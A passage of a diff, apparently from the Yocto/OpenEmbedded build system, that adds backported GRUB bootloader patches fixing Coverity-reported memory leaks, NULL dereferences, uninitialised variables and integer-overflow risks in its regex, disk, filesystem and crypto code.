24diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
25index 96d7e69..d27d3a9 100644
26--- a/conf/Makefile.extra-dist
27+++ b/conf/Makefile.extra-dist
28@@ -30,6 +30,7 @@ EXTRA_DIST += grub-core/genemuinitheader.sh
29
30 EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
31 EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-state-deref.patch
32+EXTRA_DIST += grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
33 EXTRA_DIST += grub-core/lib/gnulib-patches/fix-uninit-structure.patch
34 EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
35 EXTRA_DIST += grub-core/lib/gnulib-patches/fix-width.patch
36diff --git a/grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch b/grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
37new file mode 100644
38index 0000000..db6dac9
39--- /dev/null
40+++ b/grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
41@@ -0,0 +1,12 @@
42+--- a/lib/regexec.c 2020-10-21 14:25:35.310195912 +0000
43++++ b/lib/regexec.c 2020-11-05 10:55:09.621542984 +0000
44+@@ -1692,6 +1692,9 @@
45+ {
46+ Idx top = mctx->state_log_top;
47+
48++ if (mctx->state_log == NULL)
49++ return REG_NOERROR;
50++
51+ if ((next_state_log_idx >= mctx->input.bufs_len
52+ && mctx->input.bufs_len < mctx->input.len)
53+ || (next_state_log_idx >= mctx->input.valid_len
diff --git a/meta/recipes-bsp/grub/files/0012-gnulib-regcomp-Fix-uninitialized-re_token.patch b/meta/recipes-bsp/grub/files/0012-gnulib-regcomp-Fix-uninitialized-re_token.patch
new file mode 100644
index 0000000000..0507e0cd66
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0012-gnulib-regcomp-Fix-uninitialized-re_token.patch
@@ -0,0 +1,55 @@
1From 512b6bb380a77233b88c84b7a712896c70281d2f Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Tue, 24 Nov 2020 18:04:22 +0000
4Subject: [PATCH] gnulib/regcomp: Fix uninitialized re_token
5
6This issue has been fixed in the latest version of gnulib, so to
7maintain consistency, I've backported that change rather than doing
8something different.
9
10Fixes: CID 73828
11
12Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
13Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
14
15Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=03477085f9a33789ba6cca7cd49ab9326a1baa0e]
16Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
17---
18 conf/Makefile.extra-dist | 1 +
19 .../gnulib-patches/fix-regcomp-uninit-token.patch | 15 +++++++++++++++
20 2 files changed, 16 insertions(+)
21 create mode 100644 grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch
22
23diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
24index d27d3a9..ffe6829 100644
25--- a/conf/Makefile.extra-dist
26+++ b/conf/Makefile.extra-dist
27@@ -30,6 +30,7 @@ EXTRA_DIST += grub-core/genemuinitheader.sh
28
29 EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
30 EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-state-deref.patch
31+EXTRA_DIST += grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch
32 EXTRA_DIST += grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
33 EXTRA_DIST += grub-core/lib/gnulib-patches/fix-uninit-structure.patch
34 EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
35diff --git a/grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch b/grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch
36new file mode 100644
37index 0000000..02e0631
38--- /dev/null
39+++ b/grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch
40@@ -0,0 +1,15 @@
41+--- a/lib/regcomp.c 2020-11-24 17:06:08.159223858 +0000
42++++ b/lib/regcomp.c 2020-11-24 17:06:15.630253923 +0000
43+@@ -3808,11 +3808,7 @@
44+ create_tree (re_dfa_t *dfa, bin_tree_t *left, bin_tree_t *right,
45+ re_token_type_t type)
46+ {
47+- re_token_t t;
48+-#if defined GCC_LINT || defined lint
49+- memset (&t, 0, sizeof t);
50+-#endif
51+- t.type = type;
52++ re_token_t t = { .type = type };
53+ return create_token_tree (dfa, left, right, &t);
54+ }
55+
diff --git a/meta/recipes-bsp/grub/files/0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch b/meta/recipes-bsp/grub/files/0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch
new file mode 100644
index 0000000000..1190b0d090
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch
@@ -0,0 +1,41 @@
1From c529ca446424f1a9c64f0007dfe31fa7645d13ac Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Wed, 21 Oct 2020 14:44:10 +0000
4Subject: [PATCH] io/lzopio: Resolve unnecessary self-assignment errors
5
6These 2 assignments are unnecessary since they are just assigning
7to themselves.
8
9Fixes: CID 73643
10
11Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
12Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
13
14Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=59666e520f44177c97b82a44c169b3b315d63b42]
15Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
16---
17 grub-core/io/lzopio.c | 4 ----
18 1 file changed, 4 deletions(-)
19
20diff --git a/grub-core/io/lzopio.c b/grub-core/io/lzopio.c
21index 3014485..a7d4425 100644
22--- a/grub-core/io/lzopio.c
23+++ b/grub-core/io/lzopio.c
24@@ -125,8 +125,6 @@ read_block_header (struct grub_lzopio *lzopio)
25 sizeof (lzopio->block.ucheck)) !=
26 sizeof (lzopio->block.ucheck))
27 return -1;
28-
29- lzopio->block.ucheck = lzopio->block.ucheck;
30 }
31
32 /* Read checksum of compressed data. */
33@@ -143,8 +141,6 @@ read_block_header (struct grub_lzopio *lzopio)
34 sizeof (lzopio->block.ccheck)) !=
35 sizeof (lzopio->block.ccheck))
36 return -1;
37-
38- lzopio->block.ccheck = lzopio->block.ccheck;
39 }
40 }
41
diff --git a/meta/recipes-bsp/grub/files/0014-zstd-Initialize-seq_t-structure-fully.patch b/meta/recipes-bsp/grub/files/0014-zstd-Initialize-seq_t-structure-fully.patch
new file mode 100644
index 0000000000..19d881c1ca
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0014-zstd-Initialize-seq_t-structure-fully.patch
@@ -0,0 +1,34 @@
1From f55ffe6bd8b844a8cd9956702f42ac2eb96ad56f Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Thu, 5 Nov 2020 10:29:59 +0000
4Subject: [PATCH] zstd: Initialize seq_t structure fully
5
6While many compilers will initialize this to zero, not all will, so it
7is better to be sure that fields not being explicitly set are at known
8values, and there is code that checks this fields value elsewhere in the
9code.
10
11Fixes: CID 292440
12
13Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
14Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
15
16Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=2777cf4466719921dbe4b30af358a75e7d76f217]
17Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
18---
19 grub-core/lib/zstd/zstd_decompress.c | 2 +-
20 1 file changed, 1 insertion(+), 1 deletion(-)
21
22diff --git a/grub-core/lib/zstd/zstd_decompress.c b/grub-core/lib/zstd/zstd_decompress.c
23index 711b5b6..e4b5670 100644
24--- a/grub-core/lib/zstd/zstd_decompress.c
25+++ b/grub-core/lib/zstd/zstd_decompress.c
26@@ -1325,7 +1325,7 @@ typedef enum { ZSTD_lo_isRegularOffset, ZSTD_lo_isLongOffset=1 } ZSTD_longOffset
27 FORCE_INLINE_TEMPLATE seq_t
28 ZSTD_decodeSequence(seqState_t* seqState, const ZSTD_longOffset_e longOffsets)
29 {
30- seq_t seq;
31+ seq_t seq = {0};
32 U32 const llBits = seqState->stateLL.table[seqState->stateLL.state].nbAdditionalBits;
33 U32 const mlBits = seqState->stateML.table[seqState->stateML.state].nbAdditionalBits;
34 U32 const ofBits = seqState->stateOffb.table[seqState->stateOffb.state].nbAdditionalBits;
diff --git a/meta/recipes-bsp/grub/files/0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch b/meta/recipes-bsp/grub/files/0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch
new file mode 100644
index 0000000000..af9fcd45cc
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch
@@ -0,0 +1,43 @@
1From 0da8ef2e03a8591586b53a29af92d2ace76a04e3 Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Fri, 23 Oct 2020 09:49:59 +0000
4Subject: [PATCH] kern/partition: Check for NULL before dereferencing input
5 string
6
7There is the possibility that the value of str comes from an external
8source and continuing to use it before ever checking its validity is
9wrong. So, needs fixing.
10
11Additionally, drop unneeded part initialization.
12
13Fixes: CID 292444
14
15Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
16Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
17
18Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=bc9c468a2ce84bc767234eec888b71f1bc744fff]
19Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
20---
21 grub-core/kern/partition.c | 5 ++++-
22 1 file changed, 4 insertions(+), 1 deletion(-)
23
24diff --git a/grub-core/kern/partition.c b/grub-core/kern/partition.c
25index e499147..b10a184 100644
26--- a/grub-core/kern/partition.c
27+++ b/grub-core/kern/partition.c
28@@ -109,11 +109,14 @@ grub_partition_map_probe (const grub_partition_map_t partmap,
29 grub_partition_t
30 grub_partition_probe (struct grub_disk *disk, const char *str)
31 {
32- grub_partition_t part = 0;
33+ grub_partition_t part;
34 grub_partition_t curpart = 0;
35 grub_partition_t tail;
36 const char *ptr;
37
38+ if (str == NULL)
39+ return 0;
40+
41 part = tail = disk->partition;
42
43 for (ptr = str; *ptr;)
diff --git a/meta/recipes-bsp/grub/files/0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch b/meta/recipes-bsp/grub/files/0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch
new file mode 100644
index 0000000000..c1687c75d0
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch
@@ -0,0 +1,128 @@
1From 0c5d0fd796e6cafba179321de396681a493c4158 Mon Sep 17 00:00:00 2001
2From: Marco A Benatto <mbenatto@redhat.com>
3Date: Mon, 7 Dec 2020 11:53:03 -0300
4Subject: [PATCH] disk/ldm: Make sure comp data is freed before exiting from
5 make_vg()
6
7Several error handling paths in make_vg() do not free comp data before
8jumping to fail2 label and returning from the function. This will leak
9memory. So, let's fix all issues of that kind.
10
11Fixes: CID 73804
12
13Signed-off-by: Marco A Benatto <mbenatto@redhat.com>
14Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
15
16Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=23e39f50ca7a107f6b66396ed4d177a914dee035]
17Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
18---
19 grub-core/disk/ldm.c | 51 ++++++++++++++++++++++++++++++++++++++------
20 1 file changed, 44 insertions(+), 7 deletions(-)
21
22diff --git a/grub-core/disk/ldm.c b/grub-core/disk/ldm.c
23index 58f8a53..428415f 100644
24--- a/grub-core/disk/ldm.c
25+++ b/grub-core/disk/ldm.c
26@@ -554,7 +554,11 @@ make_vg (grub_disk_t disk,
27 comp->segments = grub_calloc (comp->segment_alloc,
28 sizeof (*comp->segments));
29 if (!comp->segments)
30- goto fail2;
31+ {
32+ grub_free (comp->internal_id);
33+ grub_free (comp);
34+ goto fail2;
35+ }
36 }
37 else
38 {
39@@ -562,7 +566,11 @@ make_vg (grub_disk_t disk,
40 comp->segment_count = 1;
41 comp->segments = grub_malloc (sizeof (*comp->segments));
42 if (!comp->segments)
43- goto fail2;
44+ {
45+ grub_free (comp->internal_id);
46+ grub_free (comp);
47+ goto fail2;
48+ }
49 comp->segments->start_extent = 0;
50 comp->segments->extent_count = lv->size;
51 comp->segments->layout = 0;
52@@ -574,15 +582,26 @@ make_vg (grub_disk_t disk,
53 comp->segments->layout = GRUB_RAID_LAYOUT_SYMMETRIC_MASK;
54 }
55 else
56- goto fail2;
57+ {
58+ grub_free (comp->segments);
59+ grub_free (comp->internal_id);
60+ grub_free (comp);
61+ goto fail2;
62+ }
63 ptr += *ptr + 1;
64 ptr++;
65 if (!(vblk[i].flags & 0x10))
66- goto fail2;
67+ {
68+ grub_free (comp->segments);
69+ grub_free (comp->internal_id);
70+ grub_free (comp);
71+ goto fail2;
72+ }
73 if (ptr >= vblk[i].dynamic + sizeof (vblk[i].dynamic)
74 || ptr + *ptr + 1 >= vblk[i].dynamic
75 + sizeof (vblk[i].dynamic))
76 {
77+ grub_free (comp->segments);
78 grub_free (comp->internal_id);
79 grub_free (comp);
80 goto fail2;
81@@ -592,6 +611,7 @@ make_vg (grub_disk_t disk,
82 if (ptr + *ptr + 1 >= vblk[i].dynamic
83 + sizeof (vblk[i].dynamic))
84 {
85+ grub_free (comp->segments);
86 grub_free (comp->internal_id);
87 grub_free (comp);
88 goto fail2;
89@@ -601,7 +621,12 @@ make_vg (grub_disk_t disk,
90 comp->segments->nodes = grub_calloc (comp->segments->node_alloc,
91 sizeof (*comp->segments->nodes));
92 if (!lv->segments->nodes)
93- goto fail2;
94+ {
95+ grub_free (comp->segments);
96+ grub_free (comp->internal_id);
97+ grub_free (comp);
98+ goto fail2;
99+ }
100 }
101
102 if (lv->segments->node_alloc == lv->segments->node_count)
103@@ -611,11 +636,23 @@ make_vg (grub_disk_t disk,
104
105 if (grub_mul (lv->segments->node_alloc, 2, &lv->segments->node_alloc) ||
106 grub_mul (lv->segments->node_alloc, sizeof (*lv->segments->nodes), &sz))
107- goto fail2;
108+ {
109+ grub_free (comp->segments->nodes);
110+ grub_free (comp->segments);
111+ grub_free (comp->internal_id);
112+ grub_free (comp);
113+ goto fail2;
114+ }
115
116 t = grub_realloc (lv->segments->nodes, sz);
117 if (!t)
118- goto fail2;
119+ {
120+ grub_free (comp->segments->nodes);
121+ grub_free (comp->segments);
122+ grub_free (comp->internal_id);
123+ grub_free (comp);
124+ goto fail2;
125+ }
126 lv->segments->nodes = t;
127 }
128 lv->segments->nodes[lv->segments->node_count].pv = 0;
diff --git a/meta/recipes-bsp/grub/files/0017-disk-ldm-If-failed-then-free-vg-variable-too.patch b/meta/recipes-bsp/grub/files/0017-disk-ldm-If-failed-then-free-vg-variable-too.patch
new file mode 100644
index 0000000000..ecdb230f76
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0017-disk-ldm-If-failed-then-free-vg-variable-too.patch
@@ -0,0 +1,28 @@
1From 253485e8df3c9dedac848567e638157530184295 Mon Sep 17 00:00:00 2001
2From: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
3Date: Mon, 7 Dec 2020 10:07:47 -0300
4Subject: [PATCH] disk/ldm: If failed then free vg variable too
5
6Fixes: CID 73809
7
8Signed-off-by: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
9Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
10
11Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=e0b83df5da538d2a38f770e60817b3a4b9d5b4d7]
12Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
13---
14 grub-core/disk/ldm.c | 1 +
15 1 file changed, 1 insertion(+)
16
17diff --git a/grub-core/disk/ldm.c b/grub-core/disk/ldm.c
18index 428415f..54713f4 100644
19--- a/grub-core/disk/ldm.c
20+++ b/grub-core/disk/ldm.c
21@@ -199,6 +199,7 @@ make_vg (grub_disk_t disk,
22 {
23 grub_free (vg->uuid);
24 grub_free (vg->name);
25+ grub_free (vg);
26 return NULL;
27 }
28 grub_memcpy (vg->uuid, label->group_guid, LDM_GUID_STRLEN);
diff --git a/meta/recipes-bsp/grub/files/0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch b/meta/recipes-bsp/grub/files/0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch
new file mode 100644
index 0000000000..26932f674c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch
@@ -0,0 +1,50 @@
1From 3e1d2f1959acbe5152cdd5818d495f6455d1a158 Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Tue, 8 Dec 2020 10:00:51 +0000
4Subject: [PATCH] disk/ldm: Fix memory leak on uninserted lv references
5
6The problem here is that the memory allocated to the variable lv is not
7yet inserted into the list that is being processed at the label fail2.
8
9As we can already see at line 342, which correctly frees lv before going
10to fail2, we should also be doing that at these earlier jumps to fail2.
11
12Fixes: CID 73824
13
14Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
15Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
16
17Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=156c281a1625dc73fd350530630c6f2d5673d4f6]
18Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
19---
20 grub-core/disk/ldm.c | 10 ++++++++--
21 1 file changed, 8 insertions(+), 2 deletions(-)
22
23diff --git a/grub-core/disk/ldm.c b/grub-core/disk/ldm.c
24index 54713f4..e82e989 100644
25--- a/grub-core/disk/ldm.c
26+++ b/grub-core/disk/ldm.c
27@@ -321,7 +321,10 @@ make_vg (grub_disk_t disk,
28 lv->visible = 1;
29 lv->segments = grub_zalloc (sizeof (*lv->segments));
30 if (!lv->segments)
31- goto fail2;
32+ {
33+ grub_free (lv);
34+ goto fail2;
35+ }
36 lv->segments->start_extent = 0;
37 lv->segments->type = GRUB_DISKFILTER_MIRROR;
38 lv->segments->node_count = 0;
39@@ -329,7 +332,10 @@ make_vg (grub_disk_t disk,
40 lv->segments->nodes = grub_calloc (lv->segments->node_alloc,
41 sizeof (*lv->segments->nodes));
42 if (!lv->segments->nodes)
43- goto fail2;
44+ {
45+ grub_free (lv);
46+ goto fail2;
47+ }
48 ptr = vblk[i].dynamic;
49 if (ptr + *ptr + 1 >= vblk[i].dynamic
50 + sizeof (vblk[i].dynamic))
diff --git a/meta/recipes-bsp/grub/files/0019-disk-cryptodisk-Fix-potential-integer-overflow.patch b/meta/recipes-bsp/grub/files/0019-disk-cryptodisk-Fix-potential-integer-overflow.patch
new file mode 100644
index 0000000000..dd7fda357d
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0019-disk-cryptodisk-Fix-potential-integer-overflow.patch
@@ -0,0 +1,50 @@
1From 2550aaa0c23fdf8b6c54e00c6b838f2e3aa81fe2 Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Thu, 21 Jan 2021 11:38:31 +0000
4Subject: [PATCH] disk/cryptodisk: Fix potential integer overflow
5
6The encrypt and decrypt functions expect a grub_size_t. So, we need to
7ensure that the constant bit shift is using grub_size_t rather than
8unsigned int when it is performing the shift.
9
10Fixes: CID 307788
11
12Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
13Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
14
15Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=a201ad17caa430aa710654fdf2e6ab4c8166f031]
16Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
17---
18 grub-core/disk/cryptodisk.c | 8 ++++----
19 1 file changed, 4 insertions(+), 4 deletions(-)
20
21diff --git a/grub-core/disk/cryptodisk.c b/grub-core/disk/cryptodisk.c
22index 5037768..6883f48 100644
23--- a/grub-core/disk/cryptodisk.c
24+++ b/grub-core/disk/cryptodisk.c
25@@ -311,10 +311,10 @@ grub_cryptodisk_endecrypt (struct grub_cryptodisk *dev,
26 case GRUB_CRYPTODISK_MODE_CBC:
27 if (do_encrypt)
28 err = grub_crypto_cbc_encrypt (dev->cipher, data + i, data + i,
29- (1U << dev->log_sector_size), iv);
30+ ((grub_size_t) 1 << dev->log_sector_size), iv);
31 else
32 err = grub_crypto_cbc_decrypt (dev->cipher, data + i, data + i,
33- (1U << dev->log_sector_size), iv);
34+ ((grub_size_t) 1 << dev->log_sector_size), iv);
35 if (err)
36 return err;
37 break;
38@@ -322,10 +322,10 @@ grub_cryptodisk_endecrypt (struct grub_cryptodisk *dev,
39 case GRUB_CRYPTODISK_MODE_PCBC:
40 if (do_encrypt)
41 err = grub_crypto_pcbc_encrypt (dev->cipher, data + i, data + i,
42- (1U << dev->log_sector_size), iv);
43+ ((grub_size_t) 1 << dev->log_sector_size), iv);
44 else
45 err = grub_crypto_pcbc_decrypt (dev->cipher, data + i, data + i,
46- (1U << dev->log_sector_size), iv);
47+ ((grub_size_t) 1 << dev->log_sector_size), iv);
48 if (err)
49 return err;
50 break;
diff --git a/meta/recipes-bsp/grub/files/0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch b/meta/recipes-bsp/grub/files/0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch
new file mode 100644
index 0000000000..eb459c547f
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch
@@ -0,0 +1,43 @@
1From 7c1813eeec78892fa651046cc224ae4e80d0c94d Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Fri, 23 Oct 2020 17:09:31 +0000
4Subject: [PATCH] hfsplus: Check that the volume name length is valid
5
6HFS+ documentation suggests that the maximum filename and volume name is
7255 Unicode characters in length.
8
9So, when converting from big-endian to little-endian, we should ensure
10that the name of the volume has a length that is between 0 and 255,
11inclusive.
12
13Fixes: CID 73641
14
15Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
16Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
17
18Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=2298f6e0d951251bb9ca97d891d1bc8b74515f8c]
19Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
20---
21 grub-core/fs/hfsplus.c | 9 +++++++++
22 1 file changed, 9 insertions(+)
23
24diff --git a/grub-core/fs/hfsplus.c b/grub-core/fs/hfsplus.c
25index dae43be..03c3c4c 100644
26--- a/grub-core/fs/hfsplus.c
27+++ b/grub-core/fs/hfsplus.c
28@@ -1007,6 +1007,15 @@ grub_hfsplus_label (grub_device_t device, char **label)
29 grub_hfsplus_btree_recptr (&data->catalog_tree, node, ptr);
30
31 label_len = grub_be_to_cpu16 (catkey->namelen);
32+
33+ /* Ensure that the length is >= 0. */
34+ if (label_len < 0)
35+ label_len = 0;
36+
37+ /* Ensure label length is at most 255 Unicode characters. */
38+ if (label_len > 255)
39+ label_len = 255;
40+
41 label_name = grub_calloc (label_len, sizeof (*label_name));
42 if (!label_name)
43 {
diff --git a/meta/recipes-bsp/grub/files/0021-zfs-Fix-possible-negative-shift-operation.patch b/meta/recipes-bsp/grub/files/0021-zfs-Fix-possible-negative-shift-operation.patch
new file mode 100644
index 0000000000..12418858f9
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0021-zfs-Fix-possible-negative-shift-operation.patch
@@ -0,0 +1,42 @@
1From c757779e5d09719666c3b155afd2421978a107bd Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Tue, 24 Nov 2020 16:41:49 +0000
4Subject: [PATCH] zfs: Fix possible negative shift operation
5
6While it is possible for the return value from zfs_log2() to be zero
7(0), it is quite unlikely, given that the previous assignment to blksz
8is shifted up by SPA_MINBLOCKSHIFT (9) before 9 is subtracted at the
9assignment to epbs.
10
11But, while unlikely during a normal operation, it may be that a carefully
12crafted ZFS filesystem could result in a zero (0) value to the
13dn_datalbkszsec field, which means that the shift left does nothing
14and assigns zero (0) to blksz, resulting in a negative epbs value.
15
16Fixes: CID 73608
17
18Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
19Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
20
21Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=a02091834d3e167320d8a262ff04b8e83c5e616d]
22Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
23---
24 grub-core/fs/zfs/zfs.c | 5 +++++
25 1 file changed, 5 insertions(+)
26
27diff --git a/grub-core/fs/zfs/zfs.c b/grub-core/fs/zfs/zfs.c
28index 36d0373..0c42cba 100644
29--- a/grub-core/fs/zfs/zfs.c
30+++ b/grub-core/fs/zfs/zfs.c
31@@ -2667,6 +2667,11 @@ dnode_get (dnode_end_t * mdn, grub_uint64_t objnum, grub_uint8_t type,
32 blksz = grub_zfs_to_cpu16 (mdn->dn.dn_datablkszsec,
33 mdn->endian) << SPA_MINBLOCKSHIFT;
34 epbs = zfs_log2 (blksz) - DNODE_SHIFT;
35+
36+ /* While this should never happen, we should check that epbs is not negative. */
37+ if (epbs < 0)
38+ epbs = 0;
39+
40 blkid = objnum >> epbs;
41 idx = objnum & ((1 << epbs) - 1);
42
diff --git a/meta/recipes-bsp/grub/files/0022-zfs-Fix-resource-leaks-while-constructing-path.patch b/meta/recipes-bsp/grub/files/0022-zfs-Fix-resource-leaks-while-constructing-path.patch
new file mode 100644
index 0000000000..5ded5520e9
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0022-zfs-Fix-resource-leaks-while-constructing-path.patch
@@ -0,0 +1,121 @@
1From 83fdffc07ec4586b375ab36189f255ffbd8f99c2 Mon Sep 17 00:00:00 2001
2From: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
3Date: Mon, 14 Dec 2020 18:54:49 -0300
4Subject: [PATCH] zfs: Fix resource leaks while constructing path
5
6There are several exit points in dnode_get_path() that are causing possible
7memory leaks.
8
9In the while(1) the correct exit mechanism should not be to do a direct return,
10but to instead break out of the loop, setting err first if it is not already set.
11
12The reason behind this is that the dnode_path is a linked list, and while doing
13through this loop, it is being allocated and built up - the only way to
14correctly unravel it is to traverse it, which is what is being done at the end
15of the function outside of the loop.
16
17Several of the existing exit points correctly did a break, but not all so this
18change makes that more consistent and should resolve the leaking of memory as
19found by Coverity.
20
21Fixes: CID 73741
22
23Signed-off-by: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
24Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
25Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
26
27Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=89bdab965805e8d54d7f75349024e1a11cbe2eb8]
28Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
29---
30 grub-core/fs/zfs/zfs.c | 30 +++++++++++++++++++++---------
31 1 file changed, 21 insertions(+), 9 deletions(-)
32
33diff --git a/grub-core/fs/zfs/zfs.c b/grub-core/fs/zfs/zfs.c
34index 0c42cba..9087a72 100644
35--- a/grub-core/fs/zfs/zfs.c
36+++ b/grub-core/fs/zfs/zfs.c
37@@ -2836,8 +2836,8 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
38
39 if (dnode_path->dn.dn.dn_type != DMU_OT_DIRECTORY_CONTENTS)
40 {
41- grub_free (path_buf);
42- return grub_error (GRUB_ERR_BAD_FILE_TYPE, N_("not a directory"));
43+ err = grub_error (GRUB_ERR_BAD_FILE_TYPE, N_("not a directory"));
44+ break;
45 }
46 err = zap_lookup (&(dnode_path->dn), cname, &objnum,
47 data, subvol->case_insensitive);
48@@ -2879,11 +2879,18 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
49 << SPA_MINBLOCKSHIFT);
50
51 if (blksz == 0)
52- return grub_error(GRUB_ERR_BAD_FS, "0-sized block");
53+ {
54+ err = grub_error (GRUB_ERR_BAD_FS, "0-sized block");
55+ break;
56+ }
57
58 sym_value = grub_malloc (sym_sz);
59 if (!sym_value)
60- return grub_errno;
61+ {
62+ err = grub_errno;
63+ break;
64+ }
65+
66 for (block = 0; block < (sym_sz + blksz - 1) / blksz; block++)
67 {
68 void *t;
69@@ -2893,7 +2900,7 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
70 if (err)
71 {
72 grub_free (sym_value);
73- return err;
74+ break;
75 }
76
77 movesize = sym_sz - block * blksz;
78@@ -2903,6 +2910,8 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
79 grub_memcpy (sym_value + block * blksz, t, movesize);
80 grub_free (t);
81 }
82+ if (err)
83+ break;
84 free_symval = 1;
85 }
86 path = path_buf = grub_malloc (sym_sz + grub_strlen (oldpath) + 1);
87@@ -2911,7 +2920,8 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
88 grub_free (oldpathbuf);
89 if (free_symval)
90 grub_free (sym_value);
91- return grub_errno;
92+ err = grub_errno;
93+ break;
94 }
95 grub_memcpy (path, sym_value, sym_sz);
96 if (free_symval)
97@@ -2949,11 +2959,12 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
98
99 err = zio_read (bp, dnode_path->dn.endian, &sahdrp, NULL, data);
100 if (err)
101- return err;
102+ break;
103 }
104 else
105 {
